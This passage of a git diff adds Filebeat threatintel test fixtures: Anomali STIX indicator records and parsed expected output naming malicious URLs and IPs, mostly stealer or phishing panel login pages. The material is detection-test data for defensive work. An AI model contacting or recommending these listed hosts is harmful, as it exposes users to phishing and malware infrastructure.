CyberCrime","id":"indicator--1989ffaf-19a7-4850-b142-d31758a3751f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:53:15.804Z","name":"mal_url: http://farsson.com/~zadmin/11/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farsson.com/~zadmin/11/login.php']","type":"indicator","valid_from":"2020-02-25T02:53:15.804Z"} +{"created":"2020-02-25T02:53:15.88Z","description":"TS ID: 55347597483; iType: mal_ip; State: active; Org: Datalot; Source: CyberCrime","id":"indicator--66939f56-1a6f-43d1-b7a4-277e3ac55584","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-77"],"modified":"2020-02-25T02:53:15.88Z","name":"mal_ip: 104.227.250.186","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '104.227.250.186']","type":"indicator","valid_from":"2020-02-25T02:53:15.88Z"} +{"created":"2020-02-25T02:53:17.191Z","description":"TS ID: 55347597555; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--fe0a731e-e2ff-49ac-a597-150ce46a31fc","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:53:17.191Z","name":"mal_url: http://farsson.com/~zadmin/12/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farsson.com/~zadmin/12/login.php']","type":"indicator","valid_from":"2020-02-25T02:53:17.191Z"} +{"created":"2020-02-25T02:53:17.224Z","description":"TS ID: 55347597468; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime","id":"indicator--53d00201-4c9a-4275-9091-4cf08fda4676","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-02-25T02:53:17.224Z","name":"mal_url: http://ayoobtextlie.com/clean/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ayoobtextlie.com/clean/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:53:17.224Z"} +{"created":"2020-02-25T02:53:17.256Z","description":"TS ID: 55347597466; iType: mal_url; State: active; Org: Uaservers Network; Source: CyberCrime","id":"indicator--4e154929-35ec-4f71-8793-6b861a9a98f1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-25T02:53:17.256Z","name":"mal_url: http://epperfums.com/divide/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://epperfums.com/divide/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:53:17.256Z"} +{"created":"2020-02-25T02:53:17.916Z","description":"TS ID: 55347597583; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--4ce097b7-254b-41cf-8c7d-934524548fd6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:53:17.916Z","name":"mal_url: http://farsson.com/~zadmin/8/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farsson.com/~zadmin/8/login.php']","type":"indicator","valid_from":"2020-02-25T02:53:17.916Z"} +{"created":"2020-02-25T02:53:17.952Z","description":"TS ID: 55347597508; iType: mal_url; State: active; Org: RUCloud; Source: CyberCrime","id":"indicator--51f063d7-600f-43c3-9f88-92e4b3b603da","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-25T02:53:17.952Z","name":"mal_url: http://petrouretro.pw/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://petrouretro.pw/login.php']","type":"indicator","valid_from":"2020-02-25T02:53:17.952Z"} +{"created":"2020-02-25T02:53:17.983Z","description":"TS ID: 55347597481; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime","id":"indicator--5c9b2227-96df-4cc8-ba6b-c23f4da9667a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-72"],"modified":"2020-02-25T02:53:17.983Z","name":"mal_url: http://imperiaskygarden.net/.choo/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://imperiaskygarden.net/.choo/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:53:17.983Z"} +{"created":"2020-02-25T02:53:36.323Z","description":"TS ID: 55347597534; iType: mal_url; State: active; Org: RUCloud; Source: CyberCrime","id":"indicator--751b74f4-ded7-426d-b425-cb9c2b3113a8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-02-25T02:53:36.323Z","name":"mal_url: http://agmardorecha.pw/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://agmardorecha.pw/login.php']","type":"indicator","valid_from":"2020-02-25T02:53:36.323Z"} +{"created":"2020-02-25T02:53:36.382Z","description":"TS ID: 55347597492; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime","id":"indicator--4fcbf6f5-5acc-42da-acb0-497583b3388d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-53"],"modified":"2020-02-25T02:53:36.382Z","name":"mal_url: http://149.28.186.68/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://149.28.186.68/login']","type":"indicator","valid_from":"2020-02-25T02:53:36.382Z"} +{"created":"2020-02-25T02:53:36.421Z","description":"TS ID: 55347597464; iType: mal_url; State: active; Org: Uaservers Network; Source: CyberCrime","id":"indicator--713e0d5f-3842-410f-98d8-25fe0f5b15db","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-25T02:53:36.421Z","name":"mal_url: http://epperfums.com/dope/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://epperfums.com/dope/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:53:36.421Z"} +{"created":"2020-02-25T02:53:42.111Z","description":"TS ID: 55347597500; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--895a994a-7833-47fe-a832-fc3ce5f070a5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-71"],"modified":"2020-02-25T02:53:42.111Z","name":"mal_url: http://45.14.14.191/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://45.14.14.191/login']","type":"indicator","valid_from":"2020-02-25T02:53:42.111Z"} +{"created":"2020-02-25T02:54:16.295Z","description":"TS ID: 55347597622; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--86fd616d-f6a3-45ff-a3a8-db1aa59defd9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:54:16.295Z","name":"mal_url: http://farsson.com/~zadmin/4/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farsson.com/~zadmin/4/login.php']","type":"indicator","valid_from":"2020-02-25T02:54:16.295Z"} +{"created":"2020-02-25T02:54:21.544Z","description":"TS ID: 55347597482; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--57fb3a6f-09ca-44a2-b309-724b570e1fd9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-02-25T02:54:21.544Z","name":"mal_url: http://klickus.com/bin/cgi/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://klickus.com/bin/cgi/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:54:21.544Z"} +{"created":"2020-02-25T02:54:32.178Z","description":"TS ID: 55347597608; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--1b2dfaef-5caa-4114-9634-cf2f9959dbfb","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:54:32.178Z","name":"mal_url: http://farsson.com/~zadmin/5/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farsson.com/~zadmin/5/login.php']","type":"indicator","valid_from":"2020-02-25T02:54:32.178Z"} +{"created":"2020-02-25T02:54:37.327Z","description":"TS ID: 55347597484; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime","id":"indicator--44544bfd-7131-4530-a9de-96c1840101c1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-02-25T02:54:37.327Z","name":"mal_url: http://ayoobtextlie.com/copy/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ayoobtextlie.com/copy/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:54:37.327Z"} +{"created":"2020-02-25T02:54:37.383Z","description":"TS ID: 55347597463; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime","id":"indicator--51779de2-0d07-4d60-abf6-afdc0dfc7637","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-02-25T02:54:37.383Z","name":"mal_url: http://0ooo.xyz/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://0ooo.xyz/login']","type":"indicator","valid_from":"2020-02-25T02:54:37.383Z"} +{"created":"2020-02-25T02:54:48.929Z","description":"TS ID: 55347597475; iType: mal_url; State: active; Org: Confluence Networks; Source: CyberCrime","id":"indicator--b7d14453-ad19-4246-961a-72f0e5136874","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-25T02:54:48.929Z","name":"mal_url: http://atlasdecarqo.com/chief4/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://atlasdecarqo.com/chief4/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:54:48.929Z"} +{"created":"2020-02-25T02:54:54.632Z","description":"TS ID: 55347597487; iType: mal_ip; State: active; Org: Cyber Cast International, S.A.; Source: CyberCrime","id":"indicator--064f2766-97b6-481d-a273-f80a97524be8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-47"],"modified":"2020-02-25T02:54:54.632Z","name":"mal_ip: 190.97.162.37","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '190.97.162.37']","type":"indicator","valid_from":"2020-02-25T02:54:54.632Z"} +{"created":"2020-02-25T02:55:06.15Z","description":"TS ID: 55347597650; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--3f3bca20-c218-431d-8250-0f600b011971","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:55:06.15Z","name":"mal_url: http://farsson.com/~zadmin/1/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farsson.com/~zadmin/1/login.php']","type":"indicator","valid_from":"2020-02-25T02:55:06.15Z"} +{"created":"2020-02-25T02:55:06.186Z","description":"TS ID: 55347597472; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime","id":"indicator--6b3d6689-75e8-4f50-a1c0-f1a1e6158493","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-02-25T02:55:06.186Z","name":"mal_url: http://ayoobtextlie.com/cutter/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ayoobtextlie.com/cutter/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:55:06.186Z"} +{"created":"2020-02-25T02:55:06.314Z","description":"TS ID: 55347597495; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--1306883c-b911-4116-9121-492450e4bb07","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-56"],"modified":"2020-02-25T02:55:06.314Z","name":"mal_url: http://92.63.197.191/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://92.63.197.191/login']","type":"indicator","valid_from":"2020-02-25T02:55:06.314Z"} +{"created":"2020-02-25T02:55:27.523Z","description":"TS ID: 55347597627; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--d4a02ea1-435f-472e-8013-07e4e24f5a2e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:55:27.523Z","name":"mal_url: http://farsson.com/~zadmin/3/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farsson.com/~zadmin/3/login.php']","type":"indicator","valid_from":"2020-02-25T02:55:27.523Z"} +{"created":"2020-02-25T02:55:35.424Z","description":"TS ID: 55347597528; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime","id":"indicator--1e8d894d-1e8b-4ba9-ae25-1e3e00c055ce","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-25T02:55:35.424Z","name":"mal_url: http://atomicwallet.email/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://atomicwallet.email/login.php']","type":"indicator","valid_from":"2020-02-25T02:55:35.424Z"} +{"created":"2020-02-25T02:55:35.462Z","description":"TS ID: 55347597489; iType: mal_url; State: active; Org: Cyber Cast International, S.A.; Source: CyberCrime","id":"indicator--cb377636-13ce-421e-926f-e33e2b954263","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-47"],"modified":"2020-02-25T02:55:35.462Z","name":"mal_url: http://190.97.162.37/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://190.97.162.37/login']","type":"indicator","valid_from":"2020-02-25T02:55:35.462Z"} +{"created":"2020-02-25T02:55:35.496Z","description":"TS ID: 55347597477; iType: mal_url; State: active; Org: Confluence Networks; Source: CyberCrime","id":"indicator--1163cdee-566a-404a-b66e-657857eb4af3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-25T02:55:35.496Z","name":"mal_url: http://atlasdecarqo.com/chief2/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://atlasdecarqo.com/chief2/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:55:35.496Z"} +{"created":"2020-02-25T02:55:39.691Z","description":"TS ID: 55347597536; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime","id":"indicator--3190b47c-44f4-4e7e-8bd5-7b16a62fd3e9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:55:39.691Z","name":"mal_ip: 195.133.201.191","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '195.133.201.191']","type":"indicator","valid_from":"2020-02-25T02:55:39.691Z"} diff --git a/x-pack/filebeat/module/threatintel/anomali/test/anomali_limo.ndjson.log-expected.json b/x-pack/filebeat/module/threatintel/anomali/test/anomali_limo.ndjson.log-expected.json new file mode 100644 index 000000000000..b6d6f76e1ee7 --- /dev/null +++ b/x-pack/filebeat/module/threatintel/anomali/test/anomali_limo.ndjson.log-expected.json @@ -0,0 +1,3412 @@ +[ + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 0, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332361; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-76" + ], + "threatintel.anomali.modified": "2020-01-22T02:58:57.431Z", + "threatintel.anomali.name": "mal_url: http://chol.cc/Work6/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://chol.cc/Work6/PvqDq929BSx_A_D_M1n_a.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T02:58:57.431Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "chol.cc", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://chol.cc/Work6/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.path": "/Work6/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 609, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332307; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-68" + ], + "threatintel.anomali.modified": "2020-01-22T02:58:57.503Z", + "threatintel.anomali.name": "mal_url: http://worldatdoor.in/lewis/Panel/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://worldatdoor.in/lewis/Panel/five/PvqDq929BSx_A_D_M1n_a.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T02:58:57.503Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "worldatdoor.in", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://worldatdoor.in/lewis/Panel/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.path": "/lewis/Panel/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 1255, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332302; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-71" + ], + "threatintel.anomali.modified": "2020-01-22T02:58:57.570Z", + "threatintel.anomali.name": "mal_url: http://f0387770.xsph.ru/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://f0387770.xsph.ru/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T02:58:57.570Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "f0387770.xsph.ru", + "threatintel.indicator.url.original": "http://f0387770.xsph.ru/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 1867, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332312; iType: mal_url; State: active; Org: Digital Ocean; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-50" + ], + "threatintel.anomali.modified": "2020-01-22T02:58:59.366Z", + "threatintel.anomali.name": "mal_url: http://178.62.187.103/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://178.62.187.103/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T02:58:59.366Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "178.62.187.103", + "threatintel.indicator.url.original": "http://178.62.187.103/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 2441, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332386; iType: mal_url; State: active; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-66" + ], + "threatintel.anomali.modified": "2020-01-22T02:58:59.457Z", + "threatintel.anomali.name": "mal_url: http://appareluea.com/panel/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://appareluea.com/panel/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T02:58:59.457Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "appareluea.com", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://appareluea.com/panel/admin.php", + "threatintel.indicator.url.path": "/panel/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 3015, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332391; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-93" + ], + "threatintel.anomali.modified": "2020-01-22T02:59:06.402Z", + "threatintel.anomali.name": "mal_url: http://nkpotu.xyz/Kpot3/login.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://nkpotu.xyz/Kpot3/login.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T02:59:06.402Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "nkpotu.xyz", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://nkpotu.xyz/Kpot3/login.php", + "threatintel.indicator.url.path": "/Kpot3/login.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 3598, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332372; iType: mal_ip; State: active; Org: Unified Layer; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-49" + ], + "threatintel.anomali.modified": "2020-01-22T02:59:19.990Z", + "threatintel.anomali.name": "mal_ip: 162.144.128.116", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[ipv4-addr:value = '162.144.128.116']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T02:59:19.990Z", + "threatintel.indicator.ip": "162.144.128.116", + "threatintel.indicator.type": "ipv4-addr" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 4149, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332313; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-79" + ], + "threatintel.anomali.modified": "2020-01-22T02:59:20.155Z", + "threatintel.anomali.name": "mal_url: http://ntrcgroup.com/nze/panel/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://ntrcgroup.com/nze/panel/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T02:59:20.155Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "ntrcgroup.com", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://ntrcgroup.com/nze/panel/admin.php", + "threatintel.indicator.url.path": "/nze/panel/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 4747, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332350; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-76" + ], + "threatintel.anomali.modified": "2020-01-22T02:59:25.521Z", + "threatintel.anomali.name": "mal_url: http://chol.cc/Work8/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://chol.cc/Work8/PvqDq929BSx_A_D_M1n_a.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T02:59:25.521Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "chol.cc", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://chol.cc/Work8/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.path": "/Work8/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 5356, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332291; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-68" + ], + "threatintel.anomali.modified": "2020-01-22T02:59:25.626Z", + "threatintel.anomali.name": "mal_url: http://f0390764.xsph.ru/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://f0390764.xsph.ru/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T02:59:25.626Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "f0390764.xsph.ru", + "threatintel.indicator.url.original": "http://f0390764.xsph.ru/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 5971, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332343; iType: mal_ip; State: active; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-85" + ], + "threatintel.anomali.modified": "2020-01-22T02:59:36.461Z", + "threatintel.anomali.name": "mal_ip: 45.143.138.39", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[ipv4-addr:value = '45.143.138.39']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T02:59:36.461Z", 